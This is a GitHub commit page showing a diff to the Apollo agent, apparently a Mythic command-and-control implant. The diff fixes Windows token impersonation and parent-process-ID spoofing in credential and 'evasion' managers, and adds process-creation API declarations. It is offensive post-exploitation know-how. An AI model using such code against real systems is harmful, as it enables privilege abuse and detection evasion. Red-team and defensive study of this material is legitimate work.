Skip to content

Commit

Permalink
Merge pull request #53 from MythicAgents/token_impersonation_bugfix
Browse files Browse the repository at this point in the history
Token Impersonation and PPID Spoofing
  • Loading branch information
djhohnstein authored Aug 27, 2021
2 parents 448f9cd + 9661e57 commit b3f8fe7
Show file tree
Hide file tree
Showing 8 changed files with 199 additions and 131 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ public static void Execute(Job job, Agent agent)
job.SetComplete($"Set parent process ID of post-ex jobs to {pid}");
} else
{
job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running.");
job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running and in the same desktop session as Apollo.");
}
}
}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -138,7 +138,7 @@ public static void Execute(Job job, Agent implant)
{
if (sacrificialProcess.ExitCode == 0 && sacrificialProcess.PID != 0)
{
job.SetComplete(String.Format("\nProcess executed '{0}' with PID {1} and returned exit code {2}", cmdString, sacrificialProcess.PID, sacrificialProcess.ExitCode));
job.SetComplete("");
} else
{
job.SetError($"Unknown error. Exit code: {sacrificialProcess.ExitCode} from PID: {sacrificialProcess.PID}");
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -23,8 +23,6 @@
#define SPAWN
#endif

#define POWERPICK

#if MAKE_TOKEN || PRINTSPOOFER||SPAWN||STEAL_TOKEN || REV2SELF || GETPRIVS || WHOAMI || POWERPICK || MIMIKATZ || EXECUTE_ASSEMBLY


Expand Down Expand Up @@ -69,7 +67,8 @@ internal static class CredentialManager

private static IntPtr phImpersonatedImpersonationToken = IntPtr.Zero;
private static IntPtr phImpersonatedPrimaryToken = IntPtr.Zero;
internal static WindowsIdentity CurrentIdentity { get; private set; } = WindowsIdentity.GetCurrent();
internal static WindowsIdentity OriginalIdentity { get; private set; } = WindowsIdentity.GetCurrent();
internal static WindowsIdentity CurrentIdentity { get; private set; } = OriginalIdentity;

// I think there might be a race condition with pth and this
private static IntPtr executingThread = IntPtr.Zero;
Expand Down Expand Up @@ -125,19 +124,21 @@ internal static bool SetCredential(string username, string password, string doma
}
else
{
phImpersonatedPrimaryToken = hToken;
bRet = DuplicateTokenEx(
phImpersonatedPrimaryToken,
TokenAccessLevels.MaximumAllowed,
IntPtr.Zero,
TokenImpersonationLevel.Impersonation,
TOKEN_TYPE.TokenImpersonation,
out IntPtr dupToken);
if (bRet)
SetImpersonatedImpersonationToken(dupToken);
else
if (SetImpersonatedPrimaryToken(hToken))
{
RevertToSelf();
bRet = DuplicateTokenEx(
phImpersonatedPrimaryToken,
TokenAccessLevels.MaximumAllowed,
IntPtr.Zero,
TokenImpersonationLevel.Impersonation,
TOKEN_TYPE.TokenImpersonation,
out IntPtr dupToken);
if (bRet)
SetImpersonatedImpersonationToken(dupToken);
else
{
RevertToSelf();
}
}

}
Expand Down Expand Up @@ -324,11 +325,12 @@ internal static void FlushCredentials()
phImpersonatedPrimaryToken = IntPtr.Zero;
phImpersonatedImpersonationToken = IntPtr.Zero;
userCredential = new Credential();
CurrentIdentity = new WindowsIdentity(originalImpersonationToken);
CurrentIdentity = OriginalIdentity;
}

internal static bool SetImpersonatedPrimaryToken(IntPtr hToken)
{
// add the requisite privs for createprocessasuser call when necessary
if (!initialized)
return false;
bool bRet = true;
Expand Down
12 changes: 9 additions & 3 deletions Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
Original file line number Diff line number Diff line change
Expand Up @@ -90,9 +90,15 @@ internal static bool SetParentProcessId(int processId)
bool bRet = false;
try
{
System.Diagnostics.Process.GetProcessById(processId);
bRet = true;
_parentProcessId = processId;
var curProc = System.Diagnostics.Process.GetCurrentProcess();
var proc = System.Diagnostics.Process.GetProcessById(processId);
if (proc.SessionId != curProc.SessionId)
bRet = false;
else
{
bRet = true;
_parentProcessId = processId;
}
} catch { }
return bRet;
}
Expand Down
71 changes: 40 additions & 31 deletions Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
Original file line number Diff line number Diff line change
Expand Up @@ -216,13 +216,25 @@ internal extern static bool LogonUserA(
LOGON_PROVIDER dwLogonProvider,
out IntPtr phToken);

[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
internal static extern bool CreateProcessWithTokenW(
SafeFileHandle hToken,
LogonFlags dwLogonFlags,
string lpApplicationName,
string lpCommandLine,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref StartupInfo lpStartupInfo,
out ProcessInformation lpProcessInformation);

[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
internal static extern bool CreateProcessWithTokenW(
IntPtr hToken,
IntPtr dwLogonFlags,
LogonFlags dwLogonFlags,
string lpApplicationName,
string lpCommandLine,
ProcessCreationFlags dwCreationFlags,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref STARTUPINFO lpStartupInfo,
Expand Down Expand Up @@ -264,34 +276,17 @@ internal static extern bool CreateProcessWithTokenW(
[In] ref StartupInfoEx lpStartupInfo,
out ProcessInformation lpProcessInformation);


[DllImport("advapi32.dll", SetLastError = true)]
internal static extern bool CreateProcessAsUserA(
IntPtr hToken,
string lpApplicationName,
StringBuilder lpCommandLine,
SECURITY_ATTRIBUTES lpProcessAttributes,
SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
ProcessCreationFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);

[DllImport("advapi32.dll", SetLastError = true)]
internal static extern bool CreateProcessAsUserA(
IntPtr hToken,
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
internal static extern bool CreateProcessWithTokenW(
SafeFileHandle hToken,
LogonFlags dwLogonFlags,
string lpApplicationName,
StringBuilder lpCommandLine,
SECURITY_ATTRIBUTES lpProcessAttributes,
SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
ProcessCreationFlags dwCreationFlags,
string lpCommandLine,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
StartupInfoEx lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
[In] ref StartupInfoEx lpStartupInfo,
out ProcessInformation lpProcessInformation);


[DllImport("kernel32.dll")]
Expand Down Expand Up @@ -497,7 +492,7 @@ DWORD dwThreadId
);*/


[DllImport("kernel32.dll")]
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
IntPtr hSourceHandle,
Expand All @@ -508,17 +503,28 @@ public static extern bool DuplicateHandle(
DuplicateOptions dwOptions
);

[DllImport("kernel32.dll")]
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
SafeFileHandle hSourceHandle,
IntPtr hTargetProcessHandle,
SafeFileHandle hTargetProcessHandle,
ref SafeFileHandle lpTargetHandle,
uint dwDesiredAccess,
bool bInheritHandle,
DuplicateOptions dwOptions
);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
SafeFileHandle hSourceHandle,
SafeFileHandle hTargetProcessHandle,
ref SafeFileHandle lpTargetHandle,
System.Enum dwDesiredAccess,
bool bInheritHandle,
DuplicateOptions dwOptions
);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccessRights dwDesiredAccess, bool bInheritHandle, uint dwThreadId);

Expand Down Expand Up @@ -992,9 +998,12 @@ internal static extern IntPtr SHGetFileInfo(

#region USERENV

[DllImport("userenv.dll", SetLastError = true)]
[DllImport("userenv.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);

[DllImport("userenv.dll", SetLastError = true)]
public static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);

#endregion
}
}
2 changes: 1 addition & 1 deletion Payload_Type/apollo/agent_code/Apollo/Native/Structures.cs
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,7 @@ public struct SECURITY_DESCRIPTOR
public IntPtr dacl;
}

[StructLayout(LayoutKind.Sequential)]
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct StartupInfo
{
public Int32 cb;
Expand Down
Loading

0 comments on commit b3f8fe7

Please sign in to comment.